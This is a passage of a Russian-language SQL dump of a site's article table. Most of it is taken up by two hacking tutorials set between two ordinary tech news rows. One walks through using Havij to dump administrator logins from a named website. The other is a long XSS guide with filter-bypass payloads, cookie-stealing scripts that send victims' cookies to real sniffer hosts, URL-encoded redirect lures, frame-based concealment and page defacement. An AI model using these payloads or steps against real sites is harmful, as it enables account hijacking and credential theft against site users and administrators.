для видео. С ее помощью можно снимать Full HD видеоролики до 30 кадров в секунду. Расширяют функциональность фотомодуля специальные режимы Nokia Pro Camera и Nokia Smart Camera . Фронтальная камера — широкоугольный HD-модуль на 1,2 Мп.<br /><br />Остальные характеристики включают модули Bluetooth 3.0, NFC, Wi-Fi a/b/g/n, A-GPS/ГЛОНАСС, поддержку сетей 2/3/4 поколения, бесплатный доступ к сервисам HERE Maps / HERE Drive+ / HERE transit, двойной микрофон с функцией Nokia Rich Recording .<br /><br />Емкость аккумулятора — 2000 мАч. Nokia обещает до 13,3 часов в режиме разговора, до 6,8 часов в режиме воспроизведения видео и до 63 часов проигрывания музыки. Так же имеется возможность беспроводной зарядки при помощи опциональной крышки.<br /><br />Габариты Nokia Lumia 1020 — 130,4 x 71,4 x 10,4 мм, вес — 158 граммов. Таким образом, смартфон чуть тоньше (без учета объектива) и гораздо легче Lumia 920 . Девайс заключен в корпус из поликарбоната. На момент релиза доступны следующие цвета:белый, желтый и черный.<br /><br />Дополнительно к смартфону будет предлагаться чехол-батарея Nokia Camera Grip PD-95G, который внешне превращает девайс в компактную камеру и позволяет удобно фотографировать одной рукой.<br /><br />Ранее сообщалось, что Nokia Lumia 1020 поступит в продажу на некоторых рынках до конца июля, его стоимость будет на уровне 600 долларов.","Все характеристики Nokia Lumia 1020","gazeta/img_913119.jpg","1373873189","374");
INSERT INTO gazeta_article VALUES("82","17","Для начала узнаем что это за программа:<br />Havij - Некий сканер SQL уязвимостей на сайте.<br />Target - Поле для ввода ссылки (Вводить следует ссылку без кавычки).<br />Настройки ниже не трогаем, оставляем все как есть.<br />Дальше идет панель управления программой, различные вкладки.<br />Ниже находится основная юзер-панель.<br />Ну и естественно лог-окно.<br />Вы нашли уязвимый сайт, отлично. В моем случае это будет:<br />http://trance-dance.com/shownews.php?id=98'<br />Подставляя кавычку после 98' мы получаем букет ошибок.<br />Вставляем ссылку (Без кавычки) в поле Target, и нажимаем Analyze.<br />Всю работу программы, мы можем наблюдать в лог окне.<br />По данной ссылке, программа будет подбирать название базы по буквам.<br />Ладно, хорошо, будем считать что программа успешно закончила анализ сайта.<br />Мы получили количество колонн, и название базы.<br />Переходим во вкладку Tables (см. Панель управления). И кликаем на кнопке GetTables.<br />Программа начнет поиск таблиц базы.<br />Вот все, есть таблицы, чтобы найти колонны таблиц, нужно кликнуть по кнопке Get Collums .<br />Программа начинает поиск колонн.<br />Все поиск окончен. Результат таков:<br />Таблица - Users<br />Колонны - Id, Username, Passwd. etc... Дабы дабыть колонны, кликаем Get columns<br />Чтобы получить данные колонн, в нашем случае данные о юзерах, нужно выделить колонны галочками, и нажать Get Data. В поле справа, и будет эта информация.<br />Отмечаем колонны которые нам требуются, например, login и password и kликаем Get data И в логе справа выводятся все пароли и логины, в нашем случае там два пользователя - админы<br />Так же нам нужно узнать, где можно войти под данными администратора.<br />В этом нам поможет функция Find Admin (см. Панель управления).<br />В поле Path to search вводим адрес сайта в таком формате:<br />http://site.ru<br />И нажимаем кнопку Start. Программа начнет поиск админки на сайте.<br />Так же можно добавить свои пути в программу.<br />Ну вот и все что я хотел сказать. <br />Вот непосредственно сcылко на данный софт http://zalil.ru/33019764<br />По просьбам добавляю видео, там на заднем фоне непонятный звук хотя весь звук был вырезан О.о","Мануал по программе Havij.","gazeta/img_249515.png","1373281142","3");
INSERT INTO gazeta_article VALUES("83","22","1. Что такое XSS вообще <br />2. Для чего нужен XSS <br />3. Пассивные и Активные XSS - определение и примеры поиска <br />Если вы в курсе - не читайте, только для новичков, хотя есть интересные моменты и для "опытных" пользователей. <br />Итак, XSS - это http://ru.wikipedia.org/wiki/Межсайтовый_скриптинг <br />=====Статья #1 XSS - взглядом хакера.Как хакеры используют XSS======== <br />Cookies -что такое? <br />Служат для сохранения учётных данных сайта на компьютере юзера. <br />Если вы зарегестрировались на сайте под именем "Вася Попов" <br />то сайт сохранил у вас на компьютере файл с cookies где закодированы <br />ваши данные. <br />А теперь представим, что вы Вася Попов администратор сайта. <br />У вас есть доступ к изменению информации на сайте и прочей байде. <br />Я "Антон Котов" перехватываю cookies Васи Попова. <br />И и захожу на сайт...сайт меня определяет как Васю Попова и у меня <br />администраторские права. <br />Таким вот не хитрым способом можем перехватывать права. <br />Чтобы перехватить cookies надо найти место на сайте, где можно выполнить <br />XSS-атаку. (прим. - т.е. это и есть сама суть XSS) <br />Перехват кукисов. <br />Скачайте программу A4 Proxy <br />установите её. <br />в меню options установите галочку direct connection <br />во вкладке proxy options установите browser port 8080 <br />check port 80 <br />Далее зайдите в Internet Explorer-сервис-свойства обозревателя-подключения <br />(выберите подключение и отметье)-настройка-поставьте галочку Использовать прокси-сервер... <br />выставьте адрес 127.0.0.1 и порт 8080 ,всё <br /><br />К примеру вы нашли XSS на каком нибудь сайте, вставляете скрипт <br /><sсriрt>img = new Image(); img.src = "http://www1.hut.ru/anek.shtml?"+document.cookie;</sсriрt> <br />переменная document.cookie это и есть cookies. <br />В данном случае cookies будут отправленны на сниифер http://www1.hut.ru/anek.shtml <br />вы сможете зайти на http://www1.hut.ru/aneksniff/sniffer.txt и увидеть перехваченные cookies <br />** <br />Дадим ссылку админу на скрипт.Подождём пока админ не посмотрит на ссылку и куки не уйдут на <br />http://www1.hut.ru/aneksniff/sniffer.txt , периодически просматриваем лог...ищем куки админа. <br />далее остаёться только подменить свои кукис на перехваченные, на сайте-жертве. <br />Заходим в A4 Proxy во вкладку Browser options в поле Variable пишем Cookie <br />в поле Replace with... копируем из лога сниффера http://www1.hut.ru/aneksniff/sniffer.txt <br />содержимое переменной query и нажимаем кнопочку add.(прим. - тоже самое можно сделать в ОПЕРА <br />-Инструменты - Дополнительно - Управление cookies - название сайта - изменить) <br />Всё заходим на сайт как админ. <br />======Статья #2.Авторские заметки о XSS========== <br />Исходя из того, что в интернете к сожалению по прежнему безопастность <br />дело не первоочередное мы практически в каждома сайте можем найти уязвимость. <br />Мы находим уязвимость и соощаем её администратору сайта, <br />что здесь у вас такая-то дыра, и что неплохо было бы если в новостях <br />сайта мелькнёт имя Next Level Security Team. <br />Итак перейду конкретно к тому как найти в данном сайте XSS. <br />Напишу об этом основываясь на своём опыте. <br />Перед нами www.site.ru что нам надо искать? <br />1) КОнечно же ищем куда загрузить картинку-XSS, <br />если есть фильтр смотрим используеться ли расширенние *.png. <br />Если используеться пробуем загрузить псевдо-картинку-XSS. <br />2) открываем каждый модуль (файл) сайта. <br />и смотрим всевозможные поля для метода Post. <br />(отправки на сервер) <br />3)ищем скрытые поля типа hidden и всякие различные элементы <br />значение которых передаваёться на сервер <br />на сервер (всякие галочки, низспадающие менюшки и т.д.) <br />Преобразовать все эти лементы в поля поможет программка IE_XSS_Kit.rar <br />или какой нить её аналог. <br />4) <br />выписываем название файла в блокнотик, <br />далее в html коде ищем строки "action" и "name" и выписываем значение. <br />Т.е. куда отправляеться и что отправляеться. <br />И так в каждом модуле просматриваем возможные переменные. <br />Дальше пробуем для кого нить малопосещаемого (по нашему мнению) модуля <br />различные переменные. <br />Выше я написал мои методы проверки на уязвимость, <br />а теперь конкретно, что делать с переменными, какое значение <br />писать и как обходить фильтр <br />А) <br />Ужасна распастраннёная узявимость типа "> <br />т.е. в каждой переменной пишем <br />"><sсriрt>alert()</sсriрt> <br />и проверяем после отправки, открываем html и ищем слово <br />alert т.е. ищем ответ сайта и что с запросом сделал фильтр. <br />Если вы обнаруживаете, что-то типа alert() или <br />">alert() <br />или <br /><sсriрt />alert()</sсriрt> <br />т.е. фильтр разришает отправлять и выполнять кавычки, он только <br />преобразует запрос => то тогда вы нашли XSS. <br />Остаёться только правильно составить запрос, чтобы он <br />выполнился. <br />Б) <br />Используем фильтр для запроса. <br />Это применяеться тогда когда к вашему запросу добавляет <br />фильтр какую нить инфу которая портит запрос. <br />к примеру вы отправили <br /><sсriрt>alert()</sсriрt> <br />а не чего не выполнилось. Вы лезете в html и видите <br /><sсriрt>alert()</sсriрt>> <br />свой целый запрос + <br />фильтр добавил "> <br />Тут легко, естественно нам следует послать <br /><sсriрt>alert()</sсriрt <br />Фильтр дополнит наш запрос и он выполниться. <br />(пример такой XSS недавно найденная на форуме в хакер.ру) <br />Бывает такое загружаете запрос а фильтр дополняется тэги <br /></sсriрt> какую нить фигню.Т.е. вы загружаете <br /><sсriрt>alert()</sсriрt> <br />открываете html ищите alert и видите такую картину: <br /><sсriрt></sсriрt></textarea>alert()</sсriрt> <br />В некоторых случаях этот фильтр тоже не трудно обойти, <br />пишем <br /><sсriрt></sсriрt></textarea><sсriрt>alert()</sсriрt> <br />(аналогич. XSS можно узреть в форумах на Ruhelp.com) <br />В) Используя скрытые переменные и переменные объектов всяких менюшек и т.п. <br />пытаемся выполнить запрос. <br />т.е. сначало программой IE_XSS_Kit.rar <br />Открываем все такие объекты как простые поля и пытаемся в писать в них составить <br />запрос. <br />г) основная ошибка разработчиков движков. <br />Состоит в объявлении строковой переменной вместо числовой. <br />т.е. к примеру такой путь www.site.ru/?page_id=2 <br />Конечно мы подуммаем что переменная page_id - числовая. <br />Но я сколько раз натыкался на такие нелепые ошибки, что переменную <br />назначали строковой и она держала символы. <br />Отправим www.site/index.php?action&page_id=2k <br />Если не будет ошибки а будет надпись "страница не найденна" <br />99% что переменная строковая и мы можем попробовать вставить запрос. <br />тщательно просматривайте все такого рода переменные. <br />д)Поиск активных XSS. <br />Очень трудная и кропотливая работа. <br />Просто так вы уже в XSS на запись любой запрос не выполните. <br />Тут надо использовать другие разрешённые тэги и прекрываясь ими надо <br />выполнить запрос. <br />тэги URL,BB,IMG могут помочь нам в этом. <br />Весь смысл вставки заключаеться в том, что нам <br />надо встроить запрос в парметр img или url <br />У Img есть много парметров кроме src и alt. <br />======Статья #3.Авторские заметки о XSS - продолжение========== <br />Рассмотрим что такое XSS это выполнение произволного скрипта на сайте. <br />Скрипт будьто яваскрипт или вбскрипт или html-тэг это <br />сценраий который используеться для формирования и отображения <br />информации в браузере. <br />т.е. XSS атаки это атаки не на сам сайт а на пользователей сайта. <br />т.к. скрипты для сервера - пустое место. <br />Пассивная XSS - это когда вам удалось просто выполнить скрипт на сайте не сохраняя его. <br />Активная XSS - это когда вам удалось сохранить где нибудь в страничке скрипт <br />и при каждом обновлении странички скрипт выполняеться. <br />К примеру вставка скрипта в дневники, в доски объявлений в форум, в гостевые книги <br />и т.д. <br />Рассмотри применение пассивных XSS, открываем любой сайт и пытаемся <br />найти пассивную XSS т.е. нефильтруемое или плохофильтруемое место <br />где можно вставить свой скрипт. <br />Обычно для распознания выполнения скрипта используют скрипт вывода сообщения <br /><sсriрt>alert()</sсriрt> <br />т.е. если вышло сообщение (табличка) то вы нашли XSS. <br />Открываем любой ресурс и в полях для ввода текста пытаемся вставить <br /><sсriрt>alert()</sсriрt> <br />Пытаемся вставить во се различные поля этот скрипт...если вышло сообщение значит скрипт обработался <br />и выполнился. <br />Самая распостранёная XSS (наблюдаеться во всех местах где плохая фильтрация): <br />"><sсriрt>alert()</sсriрt> <br />Вся суть в "> <br />Давайте подуммаем что мы делаем когда вводим в поле "><sсriрt>alert()</sсriрt>, <br />что происходит? <br />мы вводим в форму "><sсriрt>alert()</sсriрt> <br />какая-то перменной присваиваеться значение поля <br />перменная обрабатываеться и "> выполняеться и закрывает скрипт и <br />выпролняя <sсriрt>alert()</sсriрt> <br />......... <br />Эта XSS самая распостранёная. <br />т.е. просматриваем все поля сайта и пытаемся вставить "><sсriрt>alert()</sсriрt> <br />если вышло сообщение вы нашли XSS...далее вы можете составить запрос <br />передачи куков на сниффер и дать эту ссылку человеку зарегестрированном на этом сайте, <br />к примеру админу...он заходит на неё и его кукисы уходят на сниффер. <br />Нам остаёться подменить свои кукисыф на адлминские и мы админы сайта=) <br />ещё если фильтруеться sсriрt XSS: <br /><sсriрt 1>alert()</sсriрt 1> <br />вот такой вот вред кроеться в пассивной XSS - воровство кукисов. <br />Надеюсь всё поняли до этого момента. <br />ПОиск всех XSS <br />А как определить крутой фильтр стоит или нет?* <br />да очень просто в любое поле вводим: сука<>,"\ <br />Дальше открываем html страничку и ищем слово "сука" <br />и смотри последующие сиволы.. <br />= <br />Если <> так и остались <br />то это раз, это значит что фильтр имеет дырку. <br />если ,"'\ символы остались такие как введёные - это два, как <br />возможные дополнительные символы к последующей XSS атаке. <br />= <br />Если открыв HTML вы не обнаружили <> то скорее всего дырка <br />в фильтре. <br />= <br />Если открыв HTML вы обнаружили что <> заменены на другие символы <br />то это обломс - фильтр покрайней мере функционирет нормально. <br />Возможно ещё ввести в поле для проверки фильтрации вот так: <br />"><>'", <br />т.е. с нашей "> =))) <br />.... <br />Многие длуммают что нахождение XSS в ресрусах это тупой подбор уже <br />готовых скриптиков, --- заявляю открыто это ерунда, <br />конечно вам может повести и вы не попадёте на более менее серьёзную <br />фильтрацию и ваша XSS выполниться но это большая редкость... <br />Итак как мы поняли щупаем фильтр методом проб и проверок: <br />1) вводим в поле символы <br />2) смотри в html профильтрованый ответ что у нас получаеться <br />к примеру мы ввели в форум: <br />в различные поля е-майл сайт текст сообщения "><> <br />вышла ошибка неправильный е-майл, неправильный сайт <br />тогда в емайл вводим: suka@yandex.ru"><> <br />в сайт вводим соотвественно: http://www.com.net"><> <br />ну и в сообщение <> <br />Дело в том что на разные поля разная фильтрация, конечно серьёзные <br />разработчики ставят одинаково крутую фильтрацию на все поля, но таких оч. мало <br />Итак лезим в html ищем нашу мессагу и смотрим профильтрацию. <br />к примеру <> остались как есть тогда добавляем ещё сообщение в форуме <br />"><sсriрt>alert()</sсriрt> <br />смотрим что получилось...возможно фильтр ищет такие слова как sсriрt, javascrip,vbsсriрt <br />и фильтрует их...тогда существует возможность ввести так: "><sсriрt 1>alert()</sсriрt 1> <br />Рассмотрим случай если фильтр съедает <> <br />в этом случае существует вероятность дырки. <br />к примеру фильтра условия съедать <sсriрt>,<> и т.д. <br />тогда пробуем <qweqweqwfdfsdv213> и смотри если не съелось <br />нашли дырку...дпльше можно составить скрипт XSS <br />Ещё существует метод вложенного скрипта, к примеру вот так:<br /><sc<sсriрt>ript>alert()</sc</sсriрt>ript> <br />это если фильтр не оч. сильный и плохо фильтрует. <br />Ещё можно попробовать во так: <br />>>>><<sсriрt <br />бывает что фильтр подсчитывает откр и загр. скобки и закрывает сам. <br />т.е. сначало фильтрует а потом закрывает...что даёт нам дырку к инъекции скрипта. <br />частенько бывает что фильтр дополняет скрипт, к примеру вот этим "> (т.е. закрывает скрипт) <br />К примеру XSS на xakep.ru <br />http://forum.xakep.ru/error.asp?sessionID="><IMG%20SRC="javasсriрt:alert(); <br />фильтр смотрит что нечего опсасного в <IMG%20SRC="javasсriрt:alert(); <br />нет и закрывает тем самым выполняя скрипт. <br />..... <br />Ещё конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и <br />вставить код. <br />....... <br />Короче ребята всё надо пытаться методом проб и ошибок искать. <br />Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. <br />методом тыков понять как фильтр работает, есть ли у него недоработки. <br />если фильтр плохой мы всегда можем вставить скрипты. <br />..... <br />Теперь рассмотрим активные XSS с помощью разрешённых тэгов. <br />К примеру просмтреть ресурс, к примеру форум на наличие использования <br />тэгов [font],[img],[url] и попытаться вставить в них скрипт или комбинировать их. <br />к примеру вставляем ф форум: <br />[img]httр://www.qweqw.ru/1.jpg[/img] <br />выходит крестик...значит img используеться и мы его подобрали <br />(просто дело в том, что бывает img включён а админы из создания <br />сообщения его убирают, мол картинки вставлять нельзя <br />и бывает он в использовании разной формы) <br />если крестика нет...а весит всего надпись <br />[img]httр://www.qweqw.ru/1.jpg[/img] <br />то попробуйте ещё так: <br />[img src=httр://www.qweqw.ru/1.jpg] <br />http://www.qweqw.ru/1.jpg <br />бывает что img вообще отключен-((( <br />Ну дак вот к примеру мы добились крестика <br />вот этим [img]httр://www.qweqw.ru/1.jpg[/img] <br />проверим держит ли фильтр пробел, добавляем пробел <br />после расширения jpg <br />[img]httр://www.qweqw.ru/1.jpg [/img] <br />если крестик есть тогда ура. <br />(далее существуют у img параметры dynsrc и lowsrc которые <br />держат яваскрипт) <br />пытаемся к примеру вставить: <br />[img]http://www.qweqw.ru/1.jpg dynsrc=javasсriрt:alert()[/img] <br />проверяем отсылаем, кокроче как появиться сообщение значит нашли активную XSS <br />и вместо alert() можете вставить любой скрипт. <br />Если фильтр не сдался попробуйте так: <br />[img]http://www.qweqw.ru/"/dynsrc="javasсriрt:alert()"/1.jpg[/img] <br />и <br />[img]http://www.qweqw.ru/"/dynsrc=javasсriрt:alert()/1.jpg[/img] <br />короче всё надо тестить...абсолютно всё <br />И XSS кстати сейчас пассивные наблюдаються в 90% ресурсов. <br />а активные в 60% <br />так что у вас всегда 1\2 что найдёте активную XSS главное протестите фильтр и попытайтесь выполнить скрипт. <br />вот выпишу XSS которые я частенько юзаю: <br />(естественно их надо преобразовывать под конкретную цель) <br />[font color=[img src=http://antichat.ru/cgi-bin/s.jpg/style=display:none;background: <br />url(javasсriрt:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] <br />[font color=red[img src=http://wj.gifwj/style=background:;url(javasсriрt: <br />document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ]] <br /><IMG SRC="javasсriрt:alert('XSS');"> <br /><IMG SRC=javasсriрt:alert('XSS')> <br /><IMG SRC=JaVasсriрt:alert('XSS')> <br /><IMG SRC="livesсriрt:[code]"> <br /><IMG SRC="mocha:[code]"> <br /><IMG SRC='vbsсriрt:msgbox("XSS")'> <br /><imgjavasсriрt:alert()> <br /><IMG LOWSRC="javasсriрt:alert('XSS')"> <br /><IMG DYNSRC="javasсriрt:alert('XSS')"> <br /><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <br /><IMG SRC=" javasсriрt:alert('XSS');"> <br /><IMG SRC="javasсriрt:alert('XSS');"> <br /><IMG SRC="javasсriрt:alert('XSS');"> <br /><IMG SRC="javasсriрt:alert('XSS');"> <br /><IMG SRC="javasсriрt:alert('XSS');"> <br /><IMG SRC=`javasсriрt:alert("RSnake says, 'XSS'")`> <br /><IMG SRC=javasсriрt:alert("XSS")> <br /><XSS STYLE="xss:еxprеssion(alert('XSS'))"> <br /><XSS STYLE="behavior: url(xss.htc);"> <br /><A HREF="javasсriрt:document.location='http://www.google.com/'">XSS</A> <br /><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <br />a="get";b="URL(\"";c="javasсriрt:";d="alert('XSS');\")";eval(a+b+c+d); <br /><sсriрt SRC=http://ha.ckers.org/xss.js?<B> <br /><BR SIZE="&{alert('XSS')}"> <br />Кстати если кавычки фильтруються...есть оч. хорошая кодировка ASCII charcode <br /><IMG SRC=javasсriрt:alert(String.fromCharCode(88,83,83))> <br />ещё напишу что существует реальный псевдо-дефейс страницы в которую сохраняете активную XSS <br />это достигаеться инъекцией на чтение нового объекта <br />Делаем дефейс, кодируем его в HTML (without semicolons) кодировку и заменяем &# запятыми. <br /> вставляем в XSS document.write(String.fromCharCode(КОД)) где вместо код ваш закодированный дефейс. <br />сохраняем сообщение и вместо текущей страницы появиться ваш дефейс. <br />т.е. получаеться активная XSS может предпологать реальную атаку с псевдо-заменой (содержания) страничек. <br />пример: <br /><IMG SRC=javasсriрt:document.write(String.fromCharCode(60,104,116,109,108,62,1087,1088,1080,1084,1077,1088, <br />32,1088,1077,1072,1083,1100,1085,1086,1081,32,1072,1090,1072,1082,1080,32,1072,1082,1090,1080,1074,1085,1086, <br />1081,32,88,83,83,60,47,104,116,109,108,62))> <br />======Статья 5.Примеры поиска активных XSS========== <br />Тут постараюсь поведать о самих примерах XSS. <br />Просто видео сделать и нормально отправить интернет не позволяет, т.е. скорость передачи данных-((( <br />... <br />ВОт -с тут я напишу вначале вообщем о XSS, потом буду писать примеры: <br />1) это мы вводим, 2) - ответ фильтра 3) комменты <br />XSS: <br />1) html-кодировку используем для обхода фильтра, только если уже имеем <br />вставгу тэга. <br />к примеру так вот нельзя: <br />[полностью закодирован скрипт] <br />[<sсriрt[закодирован закр. тэг] [код инъекции] <br />[<sсriрt[закодирован закр. тэг] [код инъекции] [код закрыв. sсriрt] <br />Правильно кодировать только середину между тэгами, сами тэги должны <...> быть полностью нормальные-обычные. <br />К примеру правильно будет так: <br /><sсriрt>[код]</sсriрt> <br /><img [код]> <br />и т.д. <br />[код] не обяз. всё закодировано, надо пробовать различные комбинации. <br />2) Надо помнить что коды у символов с разны регистром (т.е. маленькая буковка - большая) разные <br />а восприятие одинаковое. <br />Поэтому надо пробовать комбинировать маленькие символы с большими и т.д. <br />Ну сразу пытаюсь протестить фильтр на символы <,>,",:,(,),/ <br />отправляю эти сиволы с каким нить словом чтобы искать ответ легче было. <br />AIRSG>,<,",:,(,),/ <br />AIRSG,>,<,:,(,),/ <br />т.е. ковычки фильтруються (съедаються) <br /><sсriрt>alert()</sсriрt> <br />sсriрtalert()/sсriрt <br />Скорее всего фильтрация идёт по извесным словам sсriрt, img и т.д. отправим левое слово и посмотрим ответ: <br /><qweqweq> <br /><qweqweq> <br />О так и думмал, теперь попоробуем: <br /><sсriрt 1>alert()</sсriрt 1> <br />sсriрt%201alert()/sсriрt%201 <br />Ну тогда пощупаем регистр: <br /><sсriрt>alert()</sсriрt> <br />sсriрtalert()/sсriрt <br />нуль эммоций, тогда, пробуем комбинировать или тестить др. букву на регистр: <br /><sсriрt>alert()</sсriрt> <br /><sсriрt>alert()</sсriрt> <br />вышел алерт <br />УРа!!! <br />Второй пример (2) <br />",>'< <br />",<,",> <br />[img src=http://qwe/1.jpg[/img] <br />http://qwe/1.jpg <br />Картинка <br />[img src=http://qwe/1.jpg[/img] <br />http://qwe/1.jpg <br />[img]javasсriрt:alert()[/img] <br />[img]javasсriрt:alert()[/img] <br />[img]http://qwe.ru/%20/dynsrc=javasсriрt:alert()/1.jpg[/img] <br />[img]http://qwe.ru/%20/dynsrc=javasсriрt:alert()/1.jpg[/img] <br />[img]http://qwe.ru/">lowsrc=javasсriрt:alert()/1.jpg()[/img] <br /><img src=http://qwe.ru/">lowsrc=javasсriрt:alert()/1.jpg()> <br />Ура XSS выполнилась!!!! <br />======Статья 6.Примеры Использования пассивных XSS========== <br />Поговорим о том как использовать пассивные XSS: <br />допустим вы нашли XSS, давать в чистом виде XSS опасно, так как <br />только полный ломак не догадаеться что это запрос напередачу куков. <br />т.е. нам надо как-то скрыть запрос. <br />============ <br />1)XSS-картинка перенаправление <br />============ <br />предлагаю следующее: <br />вставить редиректом запрос на картинку с сайта, чтобы <br />ты давал не картинку юзеру посмотреть, а левый сайт. <br />создать к примеру 2-а файла: <br />main.html <br />с любым содержанием сайта, к примеру: <br /><html> <br />Сайт находиться в стадии разработки... <br /></html> <br />и файл index.html с содержанием: <br /><html> <br /><sсriрt language="Javasсriрt"> <br />document.location.href = "http://site.ru/kartinka.jpg"; <br /></sсriрt> <br /></HTML> <br />где http://site.ru/kartinka.jpg твой путь к XSS-картинке <br />создать картинку с содержанием: <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br /><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> document.location.href = "http://pilot-86.narod.ru/main.html"; <br /></sсriрt> <br />где http://pilot-86.narod.ru ссылка на твой сайт <br />теперь тебе остаёться закачать файлы main.html и index.html <br />на сайт и предлогать юзверям посмотреть твой сайт <br />(в данном случае http://pilot-86.narod.ru/) <br />теперь сама суть: <br />юзверь заходит на сайт, срабатывает скрипт переадресации (в index.html) <br />переадресация на картинку. <br />Картинка же отдаёт куки снифферу и переадресовываеться на файл на твоём сайте main.html <br />У юзверя в url происходит кидалово по ресурсам...довольно быстрое, мало кто просечёт тему. <br />Теперь вы спросите а зачем в картинке писать много раз скрипт передачу куков, <br />отвечу просто, т.к. нужно время передачи куков на сниффер, т.е. <br />во время выполнения первого скрипта передачи куков, выполняютсья остальные (как тайм аут) <br />а потом переадресация. <br />Если сделать один скрипт передачи куков на сниф в картинке, то не всегда куки будут успевать передаваться. <br />============= <br />2)XSS запрос простое кодирование <br />============= <br />К примеру вы нашли XSS: <br />http://site.ru/?search="><sсriрt>img = new Image(); img.src = <br />"http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt> <br />предлагаю метод переадрессации...метод простой и для ломачков. <br />создаём файл Index.html с содержанием запроса. <br />Но тут надо немножко поработать...т.е. надо <br />закодировать в урл-кодировке сам запрос. <br />Вы спросите зачем это надо...поясняю, вот как бы выглядел <br />простой запрос в чистом виде: <br /><sсriрt language="Javasсriрt"> <br />document.location.href = "http://site.ru/?search="><sсriрt>img = new Image(); <br />img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;</sсriрt>;" <br /></sсriрt> <br />НУ?* <br />догадались в чём проблема?* <br />посмотрите на ковычки. <br />в данном случае у нас будет переадресация не на полный запрос а на http://site.ru/?search= <br />Нам надо закодировать или ковычки или лучше всего, полностью весь запрос <br />после = <br />я закодирвал это <br />"><sсriрt>img = new Image(); img.src = "http://glyuk.byu.ru/snif/snif.php?"+document.cookie;<sсriрt> <br />в это <br />%68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65%61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69% <br />6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A% <br />2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F%73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63% <br />75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E <br />теперь вернёмся к составлению index.html, записываем в него: <br /><sсriрt language="Javasсriрt"> <br />document.location.href = "http://site.ru/?search=%68%74%74%70%3A%2F%2F%73%69%74%65%2E%72%75%2F%3F%73%65% <br />61%72%63%68%3D%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69% <br />6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%67%6C%79%75%6B%2E%62%79%75%2E%72%75%2F%73%6E%69%66%2F% <br />73%6E%69%66%2E%70%68%70%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E" <br /></sсriрt> <br />всё кидаем Index.html на сайт и даём ссылку сайта юзеверям поглядеть=) <br />===================== <br />Метод скрытия переадресации путём скрытого фрэйма. <br />===================== <br />Создаём 3-и файла: <br />Index.html <br />с содержанием: <br /><html> <br /><frameset cols="90%,10%"> <br /><frame src="1.html" name="window1" frameborder="no" scrolling="no"> <br /><frame src="2.html" name="window2" frameborder="no" scrolling="no"> <br /></frameset> <br /></HTML> <br />файл 1.html содержанием: <br /><html><br />моя страница <br /></html> <br />и файл 2.html: <br />с переадресацией на XSS <br />В своё время я ставил врэймов 5-6 с переадресациями на разные почтовые сервера...что давало возможность с помощью одного сайта перехватить почту с разных серверов. <br />*примечание...метод с фрэймами хоть и самый крутой, но у него есть момент торможения,в файл с содержанием страницы <br />необходимо вставить какую нить тяжёленькую картинку, чтобы было время загрузки и куки успели перехватиться.","Основы XSS","gazeta/img_947365.png","1373283942","3");
INSERT INTO gazeta_article VALUES("91","20","Apple уже не сможет хвастаться на презентациях тем, что именно с ее девайсов люди чаще всего выходят в интернет (именно так и случилось на одном из последних мероприятий). Статистика, предоставленная StatCounter, говорит о том, что американская компания и тут проиграла своему основному конкуренту — Samsung.<br /><br />Сервис глобального web-мониторинга утверждает, что в июне со смартфонов Samsung стало посещаться больше web-страничек, чем с Apple iPhone и iPod touch.<br /><br />Разница минимальна — 25,47% против 25,09%, но она есть, и график показывает, что в ближайшем будущем она еще больше увеличится, если Apple не предпримет серьезных шагов. Стоит напомнить, что годом ранее Apple опережала Samsung с большим отрывом — 25,43% против 19,46%.<br /><br />Тем не менее на американском рынке ситуация для Samsung далеко не такая радужная. При помощи ее смартфонов просматривается лишь 18,3% страничек, тогда как Apple далеко впереди с 54,8%.<br /><br />Смена лидеров на мировом рынке обусловлена продвижением девайсов Samsung с большими дисплеями. Именно корейская компания, благодаря Galaxy Note, открыла новый рынок, и теперь смартфонами считаются устройства с диагоналями 5-6 дюймов (самый большой пока Sony Xperia Z Ultra с 6,44-дюймовым дисплеем), тогда как у iPhone только в прошлом году экран подрос с 3,5 до 4 дюймов.<br /><br />По последним сведениям в iPhone 5S и iPhone Lite (бюджетный iPhone), которые появятся в текущем году, дисплеи останутся на уровне 4 дюймов,что может еще больше 